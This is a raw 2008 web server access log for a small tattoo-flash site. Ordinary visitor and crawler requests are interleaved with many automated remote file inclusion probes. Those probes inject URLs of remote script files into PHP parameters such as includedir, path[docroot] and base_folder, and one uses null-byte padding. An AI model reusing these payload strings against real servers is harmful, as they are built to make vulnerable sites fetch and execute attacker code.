74.6.21.239 - - [07/May/2008:13:19:47 -0500] "GET /logs/access_log.1160179200 HTTP/1.0" 200 227582 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
82.104.53.93 - - [07/May/2008:13:21:55 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://8-p.ru/components/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
82.104.53.93 - - [07/May/2008:13:21:56 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://8-p.ru/components/id.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.803"
85.25.145.85 - - [07/May/2008:13:22:22 -0500] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.i-promo.info/test.txt? HTTP/1.1" 404 328 "-""Mozilla/4.61 (Macintosh; I; PPC)"
85.25.145.85 - - [07/May/2008:13:22:22 -0500] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.i-promo.info/test.txt? HTTP/1.1" 404 323 "-""Mozilla/4.61 (Macintosh; I; PPC)"
24.23.37.78 - - [07/May/2008:13:22:53 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www.google.com/search?q=vintage+flash+&rls=com.microsoft:*:IE-SearchBox&ie=UTF-8&oe=UTF-8&sourceid=ie7&rlz=1I7ADBR""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727)"
24.23.37.78 - - [07/May/2008:13:22:53 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727)"
24.23.37.78 - - [07/May/2008:13:22:53 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727)"
24.23.37.78 - - [07/May/2008:13:22:53 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727)"
84.16.224.119 - - [07/May/2008:13:26:52 -0500] "GET /logs/access_log.1207180800//ws/login.php?noSet=0&includedir=http://www.kulturystyka.org.pl/modules/xoopstube/images/robots.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
84.16.224.119 - - [07/May/2008:13:26:53 -0500] "GET //ws/login.php?noSet=0&includedir=http://www.kulturystyka.org.pl/modules/xoopstube/images/robots.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
84.16.224.119 - - [07/May/2008:13:26:53 -0500] "GET /logs//ws/login.php?noSet=0&includedir=http://www.kulturystyka.org.pl/modules/xoopstube/images/robots.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
67.212.173.42 - - [07/May/2008:13:29:08 -0500] "GET /logs/access_log.1207180800//ws/login.php?noSet=0&includedir=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.811"
67.212.173.42 - - [07/May/2008:13:29:08 -0500] "GET //ws/login.php?noSet=0&includedir=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.811"
67.212.173.42 - - [07/May/2008:13:29:08 -0500] "GET /logs//ws/login.php?noSet=0&includedir=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.811"
89.149.208.203 - - [07/May/2008:13:30:11 -0500] "GET /logs/access_log.1207180800//ws/login.php?noSet=0&includedir=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
89.149.208.203 - - [07/May/2008:13:30:11 -0500] "GET //ws/login.php?noSet=0&includedir=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
89.149.208.203 - - [07/May/2008:13:30:11 -0500] "GET /logs//ws/login.php?noSet=0&includedir=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
209.216.209.45 - - [07/May/2008:13:32:43 -0500] "GET /logs/include.php?path[docroot]=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
209.216.209.45 - - [07/May/2008:13:32:43 -0500] "GET /include.php?path[docroot]=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
65.55.208.133 - - [07/May/2008:13:46:14 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.133 - - [07/May/2008:13:46:14 -0500] "GET /tattoo HTTP/1.1" 301 330 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.133 - - [07/May/2008:13:49:13 -0500] "GET /tattoo/ HTTP/1.1" 200 466 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
66.225.216.227 - - [07/May/2008:13:51:14 -0500] "GET /logs/access_log.1207180800//ws/get_reminders.php?includedir=http://logam.sitesled.com/danang/echo.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.812"
66.225.216.227 - - [07/May/2008:13:51:14 -0500] "GET //ws/get_reminders.php?includedir=http://logam.sitesled.com/danang/echo.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.812"
66.225.216.227 - - [07/May/2008:13:51:14 -0500] "GET /logs//ws/get_reminders.php?includedir=http://logam.sitesled.com/danang/echo.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.812"
74.6.9.117 - - [07/May/2008:13:51:30 -0500] "GET /logs/access_log.1193097600 HTTP/1.0" 200 158328 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
213.215.223.191 - - [07/May/2008:13:58:25 -0500] "GET /logs/access_log.1207180800//ws/get_reminders.php?includedir=http://admin.sitesled.com/echo.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.808"
213.215.223.191 - - [07/May/2008:13:58:25 -0500] "GET //ws/get_reminders.php?includedir=http://admin.sitesled.com/echo.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.808"
213.215.223.191 - - [07/May/2008:13:58:25 -0500] "GET /logs//ws/get_reminders.php?includedir=http://admin.sitesled.com/echo.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.808"
65.55.208.125 - - [07/May/2008:13:59:16 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.125 - - [07/May/2008:13:59:17 -0500] "GET /logs/access_log.1190678400 HTTP/1.1" 200 174040 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
67.19.74.18 - - [07/May/2008:13:59:27 -0500] "GET /logs/access_log.1207180800//ws/get_reminders.php?includedir=http://logam.sitesled.com/danang/echo.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.810"
67.19.74.18 - - [07/May/2008:13:59:27 -0500] "GET //ws/get_reminders.php?includedir=http://logam.sitesled.com/danang/echo.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
67.19.74.18 - - [07/May/2008:13:59:27 -0500] "GET /logs//ws/get_reminders.php?includedir=http://logam.sitesled.com/danang/echo.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
74.6.17.94 - - [07/May/2008:14:01:53 -0500] "GET /logs/access_log.1206057600 HTTP/1.0" 200 204778 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
82.210.31.3 - - [07/May/2008:14:05:50 -0500] "GET /logs/index1.php?p=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
82.210.31.3 - - [07/May/2008:14:05:51 -0500] "GET /index1.php?p=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
89.149.208.203 - - [07/May/2008:14:06:15 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
89.149.208.203 - - [07/May/2008:14:06:16 -0500] "GET //Neos_Chronos/header.php?base_folder=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
85.25.145.85 - - [07/May/2008:14:06:23 -0500] "GET /scanhttp://www.i-promo.info/test.txt? HTTP/1.1" 404 320 "-""Mozilla/4.61 (Macintosh; I; PPC)"
85.25.145.85 - - [07/May/2008:14:06:23 -0500] "GET /logs/scanhttp://www.i-promo.info/test.txt? HTTP/1.1" 404 325 "-""Mozilla/4.61 (Macintosh; I; PPC)"
217.160.203.190 - - [07/May/2008:14:06:59 -0500] "GET /logs/access_log.1207180800///squirrelcart/cart_content.php?cart_isp_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
217.160.203.190 - - [07/May/2008:14:06:59 -0500] "GET ///squirrelcart/cart_content.php?cart_isp_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
217.160.203.190 - - [07/May/2008:14:06:59 -0500] "GET /logs///squirrelcart/cart_content.php?cart_isp_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
82.210.31.3 - - [07/May/2008:14:08:35 -0500] "GET /index1.php?p=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
89.149.208.203 - - [07/May/2008:14:08:36 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
89.149.208.203 - - [07/May/2008:14:08:36 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
202.60.74.190 - - [07/May/2008:14:10:09 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
202.60.74.190 - - [07/May/2008:14:10:09 -0500] "GET //Neos_Chronos/header.php?base_folder=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
74.6.24.115 - - [07/May/2008:14:12:15 -0500] "GET /logs/access_log.1195257600 HTTP/1.0" 200 189403 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
82.210.31.3 - - [07/May/2008:14:13:02 -0500] "GET /logs/access_log.1186358400/index1.php?p=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
82.210.31.3 - - [07/May/2008:14:13:03 -0500] "GET /index1.php?p=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
82.210.31.3 - - [07/May/2008:14:13:03 -0500] "GET /logs/index1.php?p=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
99.140.234.31 - - [07/May/2008:14:17:48 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "http://www.google.com/search?client=safari&rls=en-us&q=bert+grimm+flash&ie=UTF-8&oe=UTF-8""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:17:48 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:17:48 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:17:48 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:17:48 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:17:48 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:17:48 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
82.102.10.26 - - [07/May/2008:14:17:57 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://vps.istri.info/manual/secure.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.811"
82.102.10.26 - - [07/May/2008:14:17:57 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://vps.istri.info/manual/secure.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
99.140.234.31 - - [07/May/2008:14:18:07 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:18:07 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:18:07 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:18:07 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:18:07 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:18:07 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:18:07 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:18:07 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:18:07 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
74.52.9.218 - - [07/May/2008:14:19:11 -0500] "GET /logs//appserv/main.php?appserv_root=http://computersvirus.t35.com/idat.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.65"
74.52.9.218 - - [07/May/2008:14:19:11 -0500] "GET //appserv/main.php?appserv_root=http://computersvirus.t35.com/idat.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.65"
99.140.234.31 - - [07/May/2008:14:19:17 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:19:17 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:19:17 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:19:17 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:19:17 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:19:17 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:19:17 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:19:17 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:19:17 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:19:17 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:19:18 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
84.16.224.119 - - [07/May/2008:14:19:39 -0500] "GET /logs/access_log.1207008000//usr/sbin/httpd%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00http://www.timeplusmag.com/dynamicpoll/polldata/README.txt HTTP/1.1" 404 326 "-""libwww-perl/5.79"
84.16.224.119 - - [07/May/2008:14:19:39 -0500] "GET //usr/sbin/httpd%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00http://www.timeplusmag.com/dynamicpoll/polldata/README.txt HTTP/1.1" 404 299 "-""libwww-perl/5.79"
84.16.224.119 - - [07/May/2008:14:19:39 -0500] "GET /logs//usr/sbin/httpd%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00http://www.timeplusmag.com/dynamicpoll/polldata/README.txt HTTP/1.1" 404 304 "-""libwww-perl/5.79"
195.155.232.37 - - [07/May/2008:14:19:40 -0500] "GET /logs//appserv/main.php?appserv_root=http://computersvirus.t35.com/idat.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
195.155.232.37 - - [07/May/2008:14:19:41 -0500] "GET //appserv/main.php?appserv_root=http://computersvirus.t35.com/idat.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
99.140.234.31 - - [07/May/2008:14:20:23 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2214 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:20:23 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:20:23 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:20:23 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:20:23 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:20:23 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:20:23 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:20:23 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:20:23 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:20:23 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:20:23 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:21:34 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1991 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:21:34 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:21:34 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:21:34 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:21:34 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:21:34 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:21:34 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:21:34 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:21:34 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
99.140.234.31 - - [07/May/2008:14:21:34 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13"
85.17.138.13 - - [07/May/2008:14:22:28 -0500] "GET /logs/access_log.1204761600//modules/Neos_Chronos/header.php?base_folder=http://www.geocities.com/mrasafira/kasih.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
